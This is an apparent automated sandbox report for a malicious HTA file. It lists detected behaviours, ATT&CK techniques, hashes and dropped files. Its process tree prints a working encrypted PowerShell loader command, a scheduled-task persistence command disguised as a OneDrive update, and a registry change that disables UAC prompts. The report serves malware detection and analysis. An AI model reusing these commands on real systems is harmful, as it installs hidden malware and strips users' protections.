caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
13/02/2024, 05:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta
Size

76KB
MD5

7e08e28d64e2026b8325935172c27c6b
SHA1

3be2858857ffba56416db3001a4f9a382a7404ec
SHA256

caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7
SHA512

816dd4906b26ac9fdaed836ca273588cac0d807868934715d500c3a9f8ad31bd11020d3a589d016a1c60c93fe714602f45963e78932b36ae1fa4cc54048190e9
SSDEEP

768:H0nzwRQmH5omBvaGGZFD9lu2drSX0kUG39UaZd4xJk0sS7:AzwGmHfBsZFDfu2dmX0kUmU/uS7

Score

10^/10

evasion trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	3748	powershell.exe
19	3748	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
1100	tiago.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2592	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
3128	powershell.exe
3128	powershell.exe
3748	powershell.exe
3748	powershell.exe
4604	powershell.exe
4604	powershell.exe
1100	tiago.exe
1100	tiago.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4576	AcroRd32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe
4576	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4692 wrote to memory of 3128	4692	mshta.exe	83
PID 4692 wrote to memory of 3128	4692	mshta.exe	83
PID 4692 wrote to memory of 3128	4692	mshta.exe	83
PID 3128 wrote to memory of 3748	3128	powershell.exe	85
PID 3128 wrote to memory of 3748	3128	powershell.exe	85
PID 3128 wrote to memory of 3748	3128	powershell.exe	85
PID 3748 wrote to memory of 4576	3748	powershell.exe	90
PID 3748 wrote to memory of 4576	3748	powershell.exe	90
PID 3748 wrote to memory of 4576	3748	powershell.exe	90
PID 3748 wrote to memory of 4604	3748	powershell.exe	91
PID 3748 wrote to memory of 4604	3748	powershell.exe	91
PID 3748 wrote to memory of 4604	3748	powershell.exe	91
PID 4604 wrote to memory of 2592	4604	powershell.exe	93
PID 4604 wrote to memory of 2592	4604	powershell.exe	93
PID 4604 wrote to memory of 2592	4604	powershell.exe	93
PID 4576 wrote to memory of 4040	4576	AcroRd32.exe	95
PID 4576 wrote to memory of 4040	4576	AcroRd32.exe	95
PID 4576 wrote to memory of 4040	4576	AcroRd32.exe	95
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2696	4040	RdrCEF.exe	96
PID 4040 wrote to memory of 2660	4040	RdrCEF.exe	97
PID 4040 wrote to memory of 2660	4040	RdrCEF.exe	97
PID 4040 wrote to memory of 2660	4040	RdrCEF.exe	97
PID 4040 wrote to memory of 2660	4040	RdrCEF.exe	97
PID 4040 wrote to memory of 2660	4040	RdrCEF.exe	97

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\caa7a7501033b47395d0ee421464618b7777ce2a798111e29b47267b778d5fc7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4692
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $SNTyz = 'AAAAAAAAAAAAAAAAAAAAALmk2b6lObDopuf9qJWqGCtzC7CpptCgBnt5rHGdK0CvSJKhFnvqJYIoDdgjV85+2qtRocrUk9BcXKKoE9JsNJgtMBltspO1u78Mfl7YMlQ0P6ZscPVex7HSoCRP10vd0aIFQ1RIYahKuYd6bdmAphNVCCPHUBzYTI7VBNdM83D7XZFoec+s23GTfZWtuLYtYiS/OTUEzlhOwnMxN3sP2n8EbAo9BGzEBkxFbuCbhHyPb0i1m4H+rOtXNkftKSWiPM4ZXhtfLWDXCtqRIJhHmHUZErlqLgiNahl0E0q5FgZZm7OPmMEoMyuXzOzt1+cRrN1Ctv6HcMAYuAhBzws+/DaLNhYS+WE4CDQVfS8Ok13+MLPrzW7O9DoG3TCRFMLBTGp+78w993AYJtFm12crbdAyk79fGa6dn8PRunfMPiXcbyo2OkAJQE/5Sd5Qu6Wk7Dmxy98RYGde8kwD9ip5r7gf6c1124Am/BEazQnaTet4zRGw963Te9Jey/4OUUf7n/wQFzO68GOZebttJyOyf7t0YP+Phce1GZBsIMJ8r/OAa1QCgIBQ3bvh+Wb7pC4r1Bu+UgwFMnLY+oWJUr3sUMzcwoEDJylcmUbX1Usq77b1fKmB201lgyr0PKGLEt3IORnPBhTD81gOlFbkTg2IfcheTlv3Xu9kzvd3D0LOjJ6UHpKh1u7DWwC4qflR5AUIjGX81KrOdsIj4I8cSzvTEUbFoOe/Merccz3NEtk5Aq1z0o9g5fFuBaXQvrhGFkyOkdNFzRiCJEGtBWCt4ssADBmv0Mp4PLNrPGKQ+GKQNdRRdnRYWVcdDlQjvqRQoSBqMbb0RVi1bkQLcO0ZooLIzLbzcmwfgDvTyVCk2p/3p5mAhvJIGg+WcG7kH76z2nvrBGoVqQUzcEx6MvAzDXDb/VDkrzZz5DN6h42PvwxThFmO926dcbjgZUumX1jUcIsr+Cm4IQxjQnyZAscmjTeJ4WKfIU3zpS5dKT2LTLVjDxVUzzqlTmd/rBgzYJcQl1dlkMzxPLgnpQq/Pwf3+iGIYoW6TLrCGfenlPxiURCdq0ejJLKErJg0tIF+CxtB+v3FETsTyH0UkR5J3TwQjZHsgGZFNQLNnkBTwpdQAOsdW+LTRyRcION9/NP5yk3ZQHcSQeiNfbC4vS8iCRrjSR31swF/MC7PANy+yO7STigHV+6S5OCbKezZXAWlClJUP+G0Zg==';$NYvzm = 'dE92WmpUelNoc1NyUHdadGdKY1lsaHNuQWxvanpYdVg=';$JxlzVEaB = New-Object 'System.Security.Cryptography.AesManaged';$JxlzVEaB.Mode = [System.Security.Cryptography.CipherMode]::ECB;$JxlzVEaB.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$JxlzVEaB.BlockSize = 128;$JxlzVEaB.KeySize = 256;$JxlzVEaB.Key = [System.Convert]::FromBase64String($NYvzm);$CcxpA = [System.Convert]::FromBase64String($SNTyz);$cnnQFgZm = $CcxpA[0..15];$JxlzVEaB.IV = $cnnQFgZm;$LEiiXZOgN = $JxlzVEaB.CreateDecryptor();$AcOIkQZxG = $LEiiXZOgN.TransformFinalBlock($CcxpA, 16, $CcxpA.Length - 16);$JxlzVEaB.Dispose();$BMBI = New-Object System.IO.MemoryStream( , $AcOIkQZxG );$mZNCUMQO = New-Object System.IO.MemoryStream;$NPwQahcaV = New-Object System.IO.Compression.GzipStream $BMBI, ([IO.Compression.CompressionMode]::Decompress);$NPwQahcaV.CopyTo( $mZNCUMQO );$NPwQahcaV.Close();$BMBI.Close();[byte[]] $kiEmVbL = $mZNCUMQO.ToArray();$tsWNTzTK = [System.Text.Encoding]::UTF8.GetString($kiEmVbL);$tsWNTzTK | powershell -
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3128
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    - UAC bypass
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3748
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"
      4⤵
      Checks processor information in registry
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4576
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4040
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9545581D79F35B4FBD36142FD2BA4175 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:2696
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DC11A45097DBFBFF3AF730C4F9BB5B13 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DC11A45097DBFBFF3AF730C4F9BB5B13 --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:2660
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2B5AA1338AA8D91A52D5EF573D2AAD4D --mojo-platform-channel-handle=2324 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:3204
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=65066A0E9527A0BBE78C8DAFEA8937AF --mojo-platform-channel-handle=1860 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:4012
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=51EEEC5815E9D06CF315E4B910DA83A6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=51EEEC5815E9D06CF315E4B910DA83A6 --renderer-client-id=6 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job /prefetch:1
        6⤵
        
        PID:2396
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=013189DA1070CDA672C891D40C8C490A --mojo-platform-channel-handle=2732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:2960
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks.exe /TN 'MicrosoftOneDriveUpdateTaskMachine' /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4604
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /TN MicrosoftOneDriveUpdateTaskMachine /CREATE /F /TR C:\Users\Admin\AppData\Roaming\tiago.exe /SC ONLOGON
        5⤵
        Creates scheduled task(s)
        
        PID:2592
  - - C:\Users\Admin\AppData\Roaming\tiago.exe
      "C:\Users\Admin\AppData\Roaming\tiago.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1100

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
de3cebc82d53fb6d17884a1aea56b1e0

SHA1
1de17e9646d771be3b2d52680141e407fd57e588

SHA256
5ab42728ffcbd778a572eaed4551635b673157b2dad29999e48e3ce81e894550

SHA512
86b82b01122154f5c194f417b6cbaf6027381741674eb49d0ddc243aa29d0349ac7856ebe6022d6f36110001ad7c264d60f6fdb6ad7c0dbbda27e22f906b5d8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
28854213fdaa59751b2b4cfe772289cc

SHA1
fa7058052780f4b856dc2d56b88163ed55deb6ab

SHA256
7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

SHA512
1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
19cb1e21041b92dee9eabfcc4c38002d

SHA1
0a6c15fb65709dbb077edef4012456e60ae9b439

SHA256
a377bbbe35eb06a8b63fc0f5cffc6f573403672de4e9302c58dc3285484059ae

SHA512
12c8f6f83e06ccb19970b8e3fd5b03ac4caaa378adf8eded4d62d5178acc5d8016dc8343e93eafe2b7c2d6c293577d50b61814a2794a0091c0e169c653b93792

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_frieisxs.siw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
475dbfef62d8d7f81b4dd2b53d171874

SHA1
82db91018360bff63bdb7d48b772807a9e819b33

SHA256
fa94674ffac5fc9ad091b3f84ead4c9d700aa1dd3f605baafde1d737038010ad

SHA512
413b608ecd17240bf825c64d9ce136ca5dbc3670869b4b30d9ec1e6b7cbd5063937f57265ec17dad44bb309f48ff4086857cf5532971b6c5f5e8ae4b9bd2db22

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
3ee907851972b85fa6c89213ab2ff59a

SHA1
1a37d88c8ed2725c83b51a7a13c03975347edff3

SHA256
cb831c150881c73596b2dbd17c62aedfab9560a46d1b98b6203693064130af13

SHA512
2426d511f9567560b84bc69703e8603bb0e81de53ea3482dfb469269c437b25ac6bea3125ed86e4a7cb0205bf02202908f21595b02930bd5e0f93073a886bf3f

Download Submit
C:\Users\Admin\AppData\Roaming\sample.pdf

Filesize
18KB

MD5
da49bbe37855af62a6a8809453d17b83

SHA1
1f59e84376b2acda296b1b431a16e5cd5dfb7da8

SHA256
